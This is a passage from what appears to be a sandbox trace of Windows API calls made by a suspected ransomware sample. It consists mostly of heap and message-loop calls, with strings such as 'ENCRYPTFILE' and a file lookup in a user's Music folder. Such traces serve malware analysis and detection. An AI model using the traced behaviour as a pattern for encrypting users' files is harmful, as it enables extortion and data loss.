hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0109.992] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 1 [0109.992] TranslateMessage (lpMsg=0x144f534) returned 0 [0109.992] DispatchMessageW (lpMsg=0x144f534) returned 0x0 [0109.992] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0109.992] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0109.992] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0109.992] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0109.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0109.992] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0109.992] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0109.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0109.993] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0109.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0109.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0109.994] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0109.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0109.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0109.994] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0109.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0109.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0109.994] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac100 [0109.994] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0109.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0109.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0109.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0109.995] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0109.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0109.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0109.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0109.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0109.995] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0109.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0109.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0109.996] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0109.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0109.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0109.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0109.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0109.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0109.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0109.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0109.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0109.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0109.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0109.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0109.998] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0109.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0109.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.001] RtlAllocateHeap 